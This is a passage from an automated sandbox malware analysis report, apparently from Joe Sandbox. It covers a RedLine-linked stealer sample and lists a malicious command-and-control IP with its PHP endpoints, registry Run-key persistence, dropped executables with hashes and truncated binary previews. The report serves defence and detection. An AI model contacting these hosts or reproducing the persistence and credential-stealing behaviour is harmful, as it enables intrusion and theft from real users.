                                                                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico4A64.tmp.x.exe, 00000009.00000002.2164093403.00000000032EE000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000003387000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2173895800.0000000004189000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000003327000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2173895800.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000003291000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2173895800.00000000042F6000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000003259000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://tempuri.org/Entity/Id4ResponseD4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2002/12/policy4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              176.111.174.140
                                                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                                                              		201305WILWAWPLtrue

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1568551
                                                                                                                                                                                                              Start date and time:2024-12-04 18:22:12 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 10m 0s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:19
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:1
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:file.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@29/56@0/1
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 61%
                                                                                                                                                                                                              • Number of executed functions: 153
                                                                                                                                                                                                              • Number of non-executed functions: 328
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • VT rate limit hit for: file.exe

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              12:23:17API Interceptor4380x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                                              12:23:17API Interceptor7628x Sleep call for process: audiodg.exe modified
                                                                                                                                                                                                              12:23:22API Interceptor2954x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                              12:23:41API Interceptor128267x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                              12:23:50API Interceptor16x Sleep call for process: 4A64.tmp.x.exe modified
                                                                                                                                                                                                              17:23:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe
                                                                                                                                                                                                              17:23:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              176.111.174.140SecuriteInfo.com.Trojan.Siggen29.60257.7997.27318.exeGet hashmaliciousMicroClip, RedLineBrowse
                                                                                                                                                                                                              • 176.111.174.140/GrXRYWt.php?81B6BC830D1F3012343576
                                                                                                                                                                                                              vzhoAaNHAa.exeGet hashmaliciousMicroClip, RedLineBrowse
                                                                                                                                                                                                              • 176.111.174.140/GrXRYWt.php?64F0804921B53109973498
                                                                                                                                                                                                              fNzx1wx8tL.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                              • 176.111.174.140/GrXRYWt.php?8711E746C94A2518020777
                                                                                                                                                                                                              SecuriteInfo.com.Win32.MalwareX-gen.6946.2158.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                              • 176.111.174.140/GrXRYWt.php?490B3B5EB8A22925382193
                                                                                                                                                                                                              SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exeGet hashmaliciousMicroClip, RedLineBrowse
                                                                                                                                                                                                              • 176.111.174.140/GrXRYWt.php?B268D441C1ED2974164258
                                                                                                                                                                                                              r7H7xDWwI4.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 176.111.174.140/t9bdjZsL2/index.php
                                                                                                                                                                                                              r7H7xDWwI4.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 176.111.174.140/t9bdjZsL2/index.php
                                                                                                                                                                                                              Gz1bMgPzMT.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                              • 176.111.174.140/t9bdjZsL2/index.php?wal=1
                                                                                                                                                                                                              qGyiOnJETW.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                              • 176.111.174.140/GrXRYWt.php?7D8EB13923252838420810
                                                                                                                                                                                                              ldCUApd5fG.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                              • 176.111.174.140/t9bdjZsL2/index.php?wal=1

                                                                                                                                                                                                              Domains

                                                                                                                                                                                                              No context

                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              WILWAWPLSecuriteInfo.com.Trojan.Siggen29.60257.7997.27318.exeGet hashmaliciousMicroClip, RedLineBrowse
                                                                                                                                                                                                              • 176.111.174.140
                                                                                                                                                                                                              vzhoAaNHAa.exeGet hashmaliciousMicroClip, RedLineBrowse
                                                                                                                                                                                                              • 176.111.174.140
                                                                                                                                                                                                              fNzx1wx8tL.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                              • 176.111.174.140
                                                                                                                                                                                                              SecuriteInfo.com.Win32.MalwareX-gen.6946.2158.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                              • 176.111.174.140
                                                                                                                                                                                                              SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exeGet hashmaliciousMicroClip, RedLineBrowse
                                                                                                                                                                                                              • 176.111.174.140
                                                                                                                                                                                                              r7H7xDWwI4.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 176.111.174.140
                                                                                                                                                                                                              r7H7xDWwI4.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 176.111.174.140
                                                                                                                                                                                                              Gz1bMgPzMT.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                              • 176.111.174.140
                                                                                                                                                                                                              qGyiOnJETW.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                              • 176.111.174.140
                                                                                                                                                                                                              ldCUApd5fG.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                              • 176.111.174.140

                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                              No context

                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeSecuriteInfo.com.Trojan.Siggen29.60257.7997.27318.exeGet hashmaliciousMicroClip, RedLineBrowse
                                                                                                                                                                                                                vzhoAaNHAa.exeGet hashmaliciousMicroClip, RedLineBrowse
                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exeGet hashmaliciousMicroClip, RedLineBrowse
                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, AsyncRAT, Clipboard Hijacker, Cryptbot, MicroClip, Neoreklami, RedLineBrowse
                                                                                                                                                                                                                      SecuriteInfo.com.Trojan.Siggen29.42959.20394.9110.exeGet hashmaliciousAsyncRAT, MicroClip, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                        PCUEAYj8Pj.exeGet hashmaliciousAsyncRAT, MicroClip, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                          rD5Uox2mkB.exeGet hashmaliciousAsyncRAT, MicroClip, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                            2SSgZ5GqU5.exeGet hashmaliciousAsyncRAT, MicroClip, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI26522\VCRUNTIME140.dllMicrosoft.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                                                                                app.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.Siggen29.60257.7997.27318.exeGet hashmaliciousMicroClip, RedLineBrowse
                                                                                                                                                                                                                                    vzhoAaNHAa.exeGet hashmaliciousMicroClip, RedLineBrowse
                                                                                                                                                                                                                                      RQoBY766F5.exeGet hashmaliciousBabukBrowse
                                                                                                                                                                                                                                        RQoBY766F5.exeGet hashmaliciousBabukBrowse
                                                                                                                                                                                                                                          2mXowqU1Wj.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            2a2d6bO44t.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              fNzx1wx8tL.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                                                                Q3Gdn0oKkj.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4A64.tmp.x.exe.log

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3293
                                                                                                                                                                                                                                                  Entropy (8bit):5.3364558769830905
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEsq35D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qh
                                                                                                                                                                                                                                                  MD5:CD2726EE4EEF3843D6673734B77A3E0A
                                                                                                                                                                                                                                                  SHA1:AA537CC06CEF4CC75B6FF7CDC9B38F0660158717
                                                                                                                                                                                                                                                  SHA-256:2C554F3CCAFF7C559620FAF795CCCE1A01CE92A914B3CDFBF12A98F8E88FAA40
                                                                                                                                                                                                                                                  SHA-512:0ECCAAFB069D24EBC67C53E89821ED5F7FC32A752FAAF9FB4B2A99D2A6A480FF09C3B537AF01C6DCA31AD01C4143A074FDFB846BBE74D0F111F60DAB414780D5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):307712
                                                                                                                                                                                                                                                  Entropy (8bit):5.081441016319306
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:KcZqf7D34xp/0+mAOkyovcQQgIAB1fA0PuTVAtkxz53RceqiOL2bBOA:KcZqf7DIjnjXxB1fA0GTV8knkL
                                                                                                                                                                                                                                                  MD5:97EB7BAA28471EC31E5373FCD7B8C880
                                                                                                                                                                                                                                                  SHA1:397EFCD2FAE0589E9E29FC2153FFB18A86A9B709
                                                                                                                                                                                                                                                  SHA-256:9053B6BBAF941A840A7AF09753889873E51F9B15507990979537B6C982D618CB
                                                                                                                                                                                                                                                  SHA-512:323389357A9FFC5E96F5D6EF78CEB2EC5C62E4DCC1E868524B4188AFF2497810AD16DE84E498A3E49640AD0D58EADF2BA9C6EC24E512AA64D319331F003D7CED
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Trojan.Siggen29.60257.7997.27318.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: vzhoAaNHAa.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Trojan.Siggen29.42959.20394.9110.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: PCUEAYj8Pj.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: rD5Uox2mkB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: 2SSgZ5GqU5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................L...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H....... ...,...........(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5915952
                                                                                                                                                                                                                                                  Entropy (8bit):7.9860958969588625
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:98304:eAkq2B/JWHioVQWJuhswoYv5eO0zo0Ahd6y0Naxxv8fqDDAx06btVUJFaeV8+qxC:ed0HiouWJysVYvsOaoyMxxvjDDAx0alM
                                                                                                                                                                                                                                                  MD5:D9AE4AB7E356E38950359025308C78F9
                                                                                                                                                                                                                                                  SHA1:4B3DDD44F69C2AA575A1F0ECB96E0050002F16D3
                                                                                                                                                                                                                                                  SHA-256:C1B55B6F15C2AE193752A3EA651033224962002E8E67020E4D71229AF64126AB
                                                                                                                                                                                                                                                  SHA-512:A5816EB10F4894B5989B4EACE3D9DBD6D08897FFB22225BD1AEF9F5415B0C5C3D4AC1C44885369E7539368C4F879D80082FDCCD394D94161CEBF38EFFE884340
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d...0.Lg.........."....(.....X.................@....................................}.[...`.................................................l...x............`..."..............h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...............................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\VCRUNTIME140.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):89752
                                                                                                                                                                                                                                                  Entropy (8bit):6.5021374229557996
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:EFmmAQ77IPzHql9a2k+2v866Xc/0i+N1WtYil42TZiCvecbtjawN+o/J:EQmI+NnXertP42xvecbtjd+ox
                                                                                                                                                                                                                                                  MD5:0E675D4A7A5B7CCD69013386793F68EB
                                                                                                                                                                                                                                                  SHA1:6E5821DDD8FEA6681BDA4448816F39984A33596B
                                                                                                                                                                                                                                                  SHA-256:BF5FF4603557C9959ACEC995653D052D9054AD4826DF967974EFD2F377C723D1
                                                                                                                                                                                                                                                  SHA-512:CAE69A90F92936FEBDE67DACD6CE77647CB3B3ED82BB66463CD9047E90723F633AA2FC365489DE09FECDC510BE15808C183B12E6236B0893AF19633F6A670E66
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                  • Filename: Microsoft.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: app.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Trojan.Siggen29.60257.7997.27318.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: vzhoAaNHAa.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: RQoBY766F5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: RQoBY766F5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: 2mXowqU1Wj.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: 2a2d6bO44t.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: fNzx1wx8tL.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Q3Gdn0oKkj.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............x.D.x.D.x.D..AD.x.D..=D.x.D.x.D.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx.QD.x.Dx..E.x.DRich.x.D........PE..d....}.Y.........." .........T...............................................`.......Y....`A........................................p...4............@.......0..(.... ...>...P..p.......8...........................@................................................text...$........................... ..`.rdata...6.......8..................@..@.data...0.... ......................@....pdata..(....0......................@..@.rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\_bz2.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):84040
                                                                                                                                                                                                                                                  Entropy (8bit):6.41469022264903
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:SSpo7/9ZwseNsUQJ8rbXis0WwOpcAE+8aoBnuRtApxbBVZIG4VJyI:SSW7lZws+bLwOpvEZa+uRWVVZIG4VF
                                                                                                                                                                                                                                                  MD5:3DC8AF67E6EE06AF9EEC52FE985A7633
                                                                                                                                                                                                                                                  SHA1:1451B8C598348A0C0E50AFC0EC91513C46FE3AF6
                                                                                                                                                                                                                                                  SHA-256:C55821F5FDB0064C796B2C0B03B51971F073140BC210CBE6ED90387DB2BED929
                                                                                                                                                                                                                                                  SHA-512:DA16BFBC66C8ABC078278D4D3CE1595A54C9EF43AE8837CEB35AE2F4757B930FE55E258827036EBA8218315C10AF5928E30CB22C60FF69159C8FE76327280087
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H.1.).b.).b.).b.Qib.).b.A.c.).bM.=b.).b.A.c.).b.A.c.).b.A.c.).bD@.c.).b.O.c.).b.).b.).bD@.c.).bD@.c.).bD@.b.).bD@.c.).bRich.).b................PE..d.....].........." .........f......t........................................p.......a....`.............................................H............P.......@..(.......H....`......p...T...............................................8............................text...>........................... ..`.rdata..~A.......B..................@..@.data........0......................@....pdata..(....@......................@..@.rsrc........P....... ..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\_ctypes.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):123464
                                                                                                                                                                                                                                                  Entropy (8bit):5.886703955852103
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:qpG85kJGmH3c+5M333KvUPzeENGLf3Tz4ccUZw1IGVPE:qDSGT+5+KMPzyLf3TEcKu
                                                                                                                                                                                                                                                  MD5:F1E33A8F6F91C2ED93DC5049DD50D7B8
                                                                                                                                                                                                                                                  SHA1:23C583DC98AA3F6B8B108DB5D90E65D3DD72E9B4
                                                                                                                                                                                                                                                  SHA-256:9459D246DF7A3C638776305CF3683946BA8DB26A7DE90DF8B60E1BE0B27E53C4
                                                                                                                                                                                                                                                  SHA-512:229896DA389D78CBDF2168753ED7FCC72D8E0E62C6607A3766D6D47842C0ABD519AC4F5D46607B15E7BA785280F9D27B482954E931645337A152B8A54467C6A5
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..4..4..4..L@..4..\..4..\..4..\..4..\..4..]..4..R..4..R..4..]..4..4.i4..]..4..]..4..],..4..]..4.Rich.4.........PE..d.....].........." .................]....................................................`..........................................`......$a..........................H...........0...T...............................................`............................text............................... ..`.rdata..0l.......n..................@..@.data....>.......:...l..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\_hashlib.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):45640
                                                                                                                                                                                                                                                  Entropy (8bit):5.996546047346997
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:8skeCps0iszzPFrGE/CBAdIPGV03ju774xxIGsIx7WDG4yw:81eCpLzDBZ+AdIPmYju7OxIGsIxWyw
                                                                                                                                                                                                                                                  MD5:A6448BC5E5DA21A222DE164823ADD45C
                                                                                                                                                                                                                                                  SHA1:6C26EB949D7EB97D19E42559B2E3713D7629F2F9
                                                                                                                                                                                                                                                  SHA-256:3692FC8E70E6E29910032240080FC8109248CE9A996F0A70D69ACF1542FCA69A
                                                                                                                                                                                                                                                  SHA-512:A3833C7E1CF0E4D181AC4DE95C5DFA685CF528DC39010BF0AC82864953106213ECCFF70785021CCB05395B5CF0DCB89404394327CD7E69F820D14DFA6FBA8CBA
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
